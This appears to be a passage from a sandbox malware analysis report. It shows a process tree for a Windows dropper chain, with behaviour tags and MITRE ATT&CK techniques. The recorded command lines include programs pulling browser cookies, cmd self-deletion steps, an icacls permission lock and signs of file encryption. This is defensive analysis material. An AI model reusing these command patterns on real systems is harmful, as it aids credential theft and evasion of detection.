                    [11] PID:5188  "C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\karotima_2.exe" -a
                        - Executes dropped EXE
                [9] PID:5904  C:\Windows\system32\cmd.exe /c karotima_1.exe  (image: C:\Windows\SysWOW64\cmd.exe)
                  [10] PID:5988  karotima_1.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\karotima_1.exe)
                      - Executes dropped EXE
                      - Checks computer location settings
                    [11] PID:6284  "C:\Users\Admin\Documents\PHgFEn0n4RnF7W9nNSZBw4vt.exe"
                        - Executes dropped EXE
                      [12] PID:6180  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          - Executes dropped EXE
                          - Suspicious use of SetThreadContext
                      [12] PID:8168  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      [12] PID:5240  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      [12] PID:5160  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    [11] PID:6276  "C:\Users\Admin\Documents\X6ODBpxxZFIYho68uIHt80Ml.exe"
                      [12] PID:6684  C:\Users\Admin\Documents\X6ODBpxxZFIYho68uIHt80Ml.exe
                    [11] PID:6348  "C:\Users\Admin\Documents\lhHmd78utKBh4mHCibwNzuCC.exe"
                        - Executes dropped EXE
                      [12] PID:6984  "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp  (image: C:\Windows\SysWOW64\cmd.exe)
                        [13] PID:6620  cmd  (image: C:\Windows\SysWOW64\cmd.exe)
                          [14] PID:6768  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp  (image: C:\Windows\SysWOW64\findstr.exe)
                          [14] PID:3496  Acre.exe.com k  (image: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com)
                              - Suspicious use of SetThreadContext
                              - Suspicious behavior: MapViewOfSection
                            [15] PID:6676  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
                          [14] PID:4992  ping 127.0.0.1 -n 30  (image: C:\Windows\SysWOW64\PING.EXE)
                              - Runs ping.exe
                    [11] PID:6452  "C:\Users\Admin\Documents\I8cHejqtMA89JGV5R5M7N7Kp.exe"
                        - Executes dropped EXE
                        - Checks BIOS information in registry
                        - Checks whether UAC is enabled
                        - Suspicious use of NtSetInformationThreadHideFromDebugger
                      [12] PID:7484  C:\Users\Admin\AppData\Roaming\1234.exe 1234
                          - Suspicious use of SetThreadContext
                        [13] PID:5752  "{path}"  (image: C:\Users\Admin\AppData\Roaming\1234.exe)
                    [11] PID:6304  "C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe"
                        - Executes dropped EXE
                        - Suspicious use of SetThreadContext
                      [12] PID:1036  C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe
                          - Loads dropped DLL
                          - Checks processor information in registry
                        [13] PID:7188  "C:\Windows\System32\cmd.exe" /c taskkill /im dKY998s5SPzWwNMcYpaw6yUY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe" & del C:\ProgramData\*.dll & exit  (image: C:\Windows\SysWOW64\cmd.exe)
                          [14] PID:7392  taskkill /im dKY998s5SPzWwNMcYpaw6yUY.exe /f  (image: C:\Windows\SysWOW64\taskkill.exe)
                              - Kills process with taskkill
                          [14] PID:7260  timeout /t 6  (image: C:\Windows\SysWOW64\timeout.exe)
                              - Delays execution with timeout.exe
                      [12] PID:4728  C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe
                      [12] PID:6900  C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe
                    [11] PID:6524  "C:\Users\Admin\Documents\w4tIrKVX0vuANbyiyKLpSWZC.exe"
                        - Suspicious use of SetThreadContext
                      [12] PID:5064  C:\Users\Admin\Documents\w4tIrKVX0vuANbyiyKLpSWZC.exe
                    [11] PID:6720  "C:\Users\Admin\Documents\hCR0ymhY9oor8Yl3SJ6GmnVf.exe"
                      [12] PID:5996  "C:\Users\Admin\AppData\Roaming\6254666.exe"
                    [11] PID:6856  "C:\Users\Admin\Documents\5Dy7hOwiTL8Ak6QWynvwphUL.exe"
                        - Suspicious use of SetThreadContext
                      [12] PID:5864  C:\Users\Admin\Documents\5Dy7hOwiTL8Ak6QWynvwphUL.exe
                    [11] PID:6916  "C:\Users\Admin\Documents\XyWt2W8MATjVA35URM6tDLgX.exe"
                      [12] PID:6608  "C:\Users\Admin\AppData\Roaming\5530608.exe"
                      [12] PID:5052  "C:\Users\Admin\AppData\Roaming\8095701.exe"
                    [11] PID:7024  "C:\Users\Admin\Documents\oStteIIySaOnBQ3EkjOI_WM9.exe"
                        - Checks BIOS information in registry
                        - Checks whether UAC is enabled
                        - Suspicious use of NtSetInformationThreadHideFromDebugger
                    [11] PID:7076  "C:\Users\Admin\Documents\L_qUXI6RtLVPIQVw95aSnM00.exe"
                      [12] PID:7652  "C:\Users\Admin\Documents\L_qUXI6RtLVPIQVw95aSnM00.exe"
                          - Modifies data under HKEY_USERS
                      [12] PID:6360  C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 844
                          - Program crash
                    [11] PID:7132  "C:\Users\Admin\Documents\KaN4oxVdNgcWXHg7_Sl3FY8D.exe"
                        - Loads dropped DLL
                        - Checks processor information in registry
                      [12] PID:7240  "C:\Windows\System32\cmd.exe" /c taskkill /im KaN4oxVdNgcWXHg7_Sl3FY8D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KaN4oxVdNgcWXHg7_Sl3FY8D.exe" & del C:\ProgramData\*.dll & exit  (image: C:\Windows\SysWOW64\cmd.exe)
                        [13] PID:7400  taskkill /im KaN4oxVdNgcWXHg7_Sl3FY8D.exe /f  (image: C:\Windows\SysWOW64\taskkill.exe)
                            - Kills process with taskkill
                        [13] PID:7960  timeout /t 6  (image: C:\Windows\SysWOW64\timeout.exe)
                            - Delays execution with timeout.exe
                    [11] PID:7160  "C:\Users\Admin\Documents\bk4qYn6iqEu8EcFaNEfbK8xa.exe"
                      [12] PID:6964  C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 676
                          - Suspicious use of SetThreadContext
                          - Program crash
                      [12] PID:6008  C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 728
                          - Program crash
                      [12] PID:3956  C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 704
                          - Program crash
                      [12] PID:6532  C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 1456
                          - Program crash
                      [12] PID:5708  C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 1448
                          - Suspicious use of NtCreateProcessExOtherParentProcess
                          - Program crash
                    [11] PID:5204  "C:\Users\Admin\Documents\B6WBh3mhuunwV2q6nswNBqnx.exe"
                      [12] PID:5352  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        [13] PID:6572  "C:\Users\Admin\AppData\Local\Temp\7zS8E46ED94\setup_install.exe"
                            - Loads dropped DLL
                          [14] PID:3568  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  (image: C:\Windows\System32\Conhost.exe)
                              - Executes dropped EXE
                              - Suspicious use of SetThreadContext
                          [14] PID:4500  C:\Windows\system32\cmd.exe /c karotima_2.exe  (image: C:\Windows\SysWOW64\cmd.exe)
                          [14] PID:4108  C:\Windows\system32\cmd.exe /c karotima_1.exe  (image: C:\Windows\SysWOW64\cmd.exe)
                    [11] PID:6520  "C:\Users\Admin\Documents\2YmVmtTLWyb91Qe2CZ7Y8yVY.exe"
                        - Suspicious use of SetThreadContext
                      [12] PID:5624  C:\Users\Admin\Documents\2YmVmtTLWyb91Qe2CZ7Y8yVY.exe
                    [11] PID:6972  "C:\Users\Admin\Documents\sH3EbgK9T6oeicNB0HXuc4vb.exe"
                        - Checks whether UAC is enabled
                    [11] PID:6964  "C:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exe"
                      [12] PID:5460  C:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exe
                      [12] PID:6652  C:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exe
                    [11] PID:6728  "C:\Users\Admin\Documents\31wkwAtjI8KkaEGctVblKMRv.exe"
                      [12] PID:5916  "C:\Users\Admin\Documents\31wkwAtjI8KkaEGctVblKMRv.exe" -a
                    [11] PID:6056  "C:\Users\Admin\Documents\xqt8qLLHxSBbiug4VkrmvTGt.exe"
                        - Drops file in Program Files directory
                    [11] PID:5224  "C:\Users\Admin\Documents\jxRhkXsx2LCqJ11KLYQ57gus.exe"
                        - Suspicious use of SetThreadContext
                      [12] PID:2404  "C:\Users\Admin\Documents\jxRhkXsx2LCqJ11KLYQ57gus.exe"
          [6] PID:5372  "C:\Users\Admin\Documents\XC7GFZbOyXvcLg6m3jXQe4az.exe"
              - Executes dropped EXE
            [7] PID:5648  "C:\Users\Admin\Documents\XC7GFZbOyXvcLg6m3jXQe4az.exe" -a
                - Executes dropped EXE
          [6] PID:5556  "C:\Users\Admin\Documents\u23UoDWXrdQ41Fgmp4uqBhEf.exe"
              - Executes dropped EXE
            [7] PID:4464  "C:\Users\Admin\AppData\Roaming\5465436.exe"
                - Executes dropped EXE
          [6] PID:5820  "C:\Users\Admin\Documents\NIAOGBzy_hFz9YCFo91sc8Cw.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
            [7] PID:6276  C:\Users\Admin\Documents\NIAOGBzy_hFz9YCFo91sc8Cw.exe
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
          [6] PID:5136  "C:\Users\Admin\Documents\6UnP7EhagycDLPoMKxBtGRuQ.exe"
              - Executes dropped EXE
            [7] PID:6320  "C:\Users\Admin\AppData\Roaming\8397034.exe"
                - Executes dropped EXE
            [7] PID:6336  "C:\Users\Admin\AppData\Roaming\3380837.exe"
                - Executes dropped EXE
          [6] PID:5960  "C:\Users\Admin\Documents\bKfpc48xGw3Dw3RG2dKu5Vwk.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
            [7] PID:6216  C:\Users\Admin\Documents\bKfpc48xGw3Dw3RG2dKu5Vwk.exe
          [6] PID:6104  "C:\Users\Admin\Documents\szCedVVBNBra28ARc2qYEf08.exe"
              - Executes dropped EXE
              - Checks whether UAC is enabled
          [6] PID:4476  "C:\Users\Admin\Documents\U_4UFn8WiO3eu26sOYob2_Fx.exe"
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
          [6] PID:6188  "C:\Users\Admin\Documents\FSmhlU6Of5LeBRyI0j9T6fgM.exe"
              - Executes dropped EXE
            [7] PID:4724  C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 660
                - Program crash
            [7] PID:6184  C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 680
                - Program crash
            [7] PID:7012  C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1036
                - Program crash
            [7] PID:804  C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1240
                - Program crash
          [6] PID:6232  "C:\Users\Admin\Documents\bZzVstBGF42ordOVpwbQAw5J.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
            [7] PID:7148  C:\Users\Admin\Documents\bZzVstBGF42ordOVpwbQAw5J.exe
          [6] PID:6196  "C:\Users\Admin\Documents\pADyznAja7hNAcn0P3Ium4B3.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks processor information in registry
            [7] PID:7712  "C:\Windows\System32\cmd.exe" /c taskkill /im pADyznAja7hNAcn0P3Ium4B3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\pADyznAja7hNAcn0P3Ium4B3.exe" & del C:\ProgramData\*.dll & exit  (image: C:\Windows\SysWOW64\cmd.exe)
              [8] PID:8060  taskkill /im pADyznAja7hNAcn0P3Ium4B3.exe /f  (image: C:\Windows\SysWOW64\taskkill.exe)
                  - Kills process with taskkill
              [8] PID:7460  timeout /t 6  (image: C:\Windows\SysWOW64\timeout.exe)
                  - Delays execution with timeout.exe
          [6] PID:6180  "C:\Users\Admin\Documents\ies6fl_0TmfCmYRE5wqrEm57.exe"
            [7] PID:6312  "C:\Users\Admin\Documents\ies6fl_0TmfCmYRE5wqrEm57.exe"
                - Checks processor information in registry
          [6] PID:6712  "C:\Users\Admin\Documents\0IzhjBLGzhfJ1lBcluP4OBHg.exe"
            [7] PID:4840  "C:\Users\Admin\Documents\0IzhjBLGzhfJ1lBcluP4OBHg.exe"
                - Modifies data under HKEY_USERS
      [4] PID:4076  C:\Windows\system32\cmd.exe /c sonia_6.exe  (image: C:\Windows\SysWOW64\cmd.exe)
          - Suspicious use of WriteProcessMemory
        [5] PID:1120  sonia_6.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_6.exe)
            - Executes dropped EXE
            - Adds Run key to start application
          [6] PID:4444  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Executes dropped EXE
          [6] PID:5060  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Executes dropped EXE
          [6] PID:7240  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          [6] PID:6072  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      [4] PID:1172  C:\Windows\system32\cmd.exe /c sonia_7.exe  (image: C:\Windows\SysWOW64\cmd.exe)
      [4] PID:2072  C:\Windows\system32\cmd.exe /c sonia_4.exe  (image: C:\Windows\SysWOW64\cmd.exe)
          - Suspicious use of WriteProcessMemory
      [4] PID:3568  C:\Windows\system32\cmd.exe /c sonia_1.exe  (image: C:\Windows\SysWOW64\cmd.exe)
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:996
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_1.exesonia_1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_1.exe"C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_1.exe" -a2⤵PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_4.exesonia_4.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:3660
-
C:\Users\Admin\AppData\Local\Temp\setup 326.exe"C:\Users\Admin\AppData\Local\Temp\setup 326.exe"3⤵PID:4284
-
C:\Windows\winnetdriv.exe"C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626775097 04⤵
- Executes dropped EXE
PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
PID:4368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 6804⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 8404⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 9684⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 10604⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 10764⤵
- Program crash
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 9124⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
-
C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exeC:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵
- Executes dropped EXE
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4676
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7444
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"3⤵
- Executes dropped EXE
PID:4812 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4812 -s 10164⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhangd.exe"C:\Users\Admin\AppData\Local\Temp\zhangd.exe"3⤵
- Executes dropped EXE
PID:4604
-
-
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵PID:3860
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:1684
-
C:\Users\Admin\AppData\Local\Temp\zhangd.exe"C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a1⤵
- Executes dropped EXE
PID:5104
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4284
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5156
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5244
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:6056 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:6076
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5576
-
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies Internet Explorer settings
- Modifies registry class
PID: 6048
[depth 1] C:\Windows\system32\werfault.exe
Command line: werfault.exe /h /shared Global\b01aa707fa2344c8b3c74dfc30b739c3 /t 5240 /p 6048
PID: 6664
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- Modifies registry class
PID: 6736
[depth 1] C:\Windows\system32\rUNdlL32.eXe
Command line: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
- Process spawned unexpected child process
PID: 4460

[depth 2] C:\Windows\SysWOW64\rundll32.exe
Command line: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
PID: 6528
[depth 1] \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k netsvcs -s seclogon
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID: 3896
[depth 1] C:\Users\Admin\AppData\Local\Temp\9E06.exe
Command line: C:\Users\Admin\AppData\Local\Temp\9E06.exe
- Suspicious use of SetThreadContext
PID: 7576
[depth 2] C:\Users\Admin\AppData\Local\Temp\9E06.exe
Command line: C:\Users\Admin\AppData\Local\Temp\9E06.exe
- Adds Run key to start application
PID: 6156
[depth 3] C:\Windows\SysWOW64\icacls.exe
Command line: icacls "C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32" /deny *S-1-1-0:(OI)(CI)(DE,DC)
- Modifies file permissions
PID: 5904
[depth 3] C:\Users\Admin\AppData\Local\Temp\9E06.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\9E06.exe" --Admin IsNotAutoStart IsNotTask
- Suspicious use of SetThreadContext
PID: 6092
[depth 4] C:\Users\Admin\AppData\Local\Temp\9E06.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\9E06.exe" --Admin IsNotAutoStart IsNotTask
- Modifies extensions of user files
- Loads dropped DLL
PID: 6076
[depth 5] C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe
Command line: "C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe"
- Checks computer location settings
- Suspicious use of SetThreadContext
PID: 4284
[depth 6] C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe
Command line: "C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe"
- Loads dropped DLL
- Checks processor information in registry
PID: 6308
[depth 7] C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe" & del C:\ProgramData\*.dll & exit
PID: 6416
[depth 8] C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /im build2.exe /f
- Kills process with taskkill
PID: 7360
[depth 8] C:\Windows\SysWOW64\timeout.exe
Command line: timeout /t 6
- Delays execution with timeout.exe
PID: 6516
[depth 1] C:\Users\Admin\AppData\Local\Temp\D880.exe
Command line: C:\Users\Admin\AppData\Local\Temp\D880.exe
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
PID: 6132
[depth 2] C:\ProgramData\BNKIBJUQX4H2CQ2R.exe
Command line: "C:\ProgramData\BNKIBJUQX4H2CQ2R.exe"
PID: 4536
[depth 2] C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im D880.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D880.exe" & del C:\ProgramData\*.dll & exit
PID: 7428
[depth 3] C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /im D880.exe /f
- Kills process with taskkill
PID: 5240
[depth 3] C:\Windows\SysWOW64\timeout.exe
Command line: timeout /t 6
- Delays execution with timeout.exe
PID: 4628
[depth 1] C:\Users\Admin\AppData\Local\Temp\F688.exe
Command line: C:\Users\Admin\AppData\Local\Temp\F688.exe
PID: 7392
[depth 1] C:\Users\Admin\AppData\Local\Temp\CF00.exe
Command line: C:\Users\Admin\AppData\Local\Temp\CF00.exe
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID: 6496
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
- Disabling Security Tools (1)
- File and Directory Permissions Modification (1)
- Install Root Certificate (1)
- Modify Registry (4)
- Virtualization/Sandbox Evasion (1)
- Web Service (1)